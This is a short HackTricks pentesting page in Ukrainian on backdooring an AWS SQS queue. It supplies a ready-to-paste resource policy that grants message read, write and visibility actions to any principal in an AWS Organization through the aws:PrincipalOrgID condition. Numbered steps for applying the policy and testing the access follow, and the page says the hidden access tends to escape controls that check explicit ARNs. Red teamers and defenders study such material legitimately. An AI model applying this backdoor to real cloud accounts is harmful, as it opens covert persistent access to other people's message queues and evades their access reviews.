AWS - SQS OrgID Policy Backdoor

Reading time: 2 minutes

tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримка HackTricks

Зловживайте політикою ресурсу черги SQS, щоб непомітно надати Send, Receive та ChangeMessageVisibility будь-якому principal, який належить до цільової AWS Organization, використовуючи умову aws:PrincipalOrgID. Це створює прихований шлях в масштабі організації, який часто оминає контролі, що перевіряють лише явні account або role ARNs чи star principals.

Backdoor policy (додати до політики черги SQS)

json
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "OrgScopedBackdoor",
"Effect": "Allow",
"Principal": "*",
"Action": [
"sqs:ReceiveMessage",
"sqs:SendMessage",
"sqs:ChangeMessageVisibility",
"sqs:GetQueueAttributes"
],
"Resource": "arn:aws:sqs:REGION:ACCOUNT_ID:QUEUE_NAME",
"Condition": {
"StringEquals": { "aws:PrincipalOrgID": "o-xxxxxxxxxx" }
}
}
]
}

Кроки

  • Отримайте Organization ID за допомогою AWS Organizations API.
  • Отримайте SQS queue ARN та налаштуйте queue policy, включивши в неї наведену вище statement.
  • Від будь-якого principal, що належить до цієї Organization, відправте та отримайте повідомлення в queue, щоб перевірити доступ.

Наслідки

  • Прихований доступ по всій Organization для читання та запису SQS messages з будь-якого account у вказаній AWS Organization.

tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримка HackTricks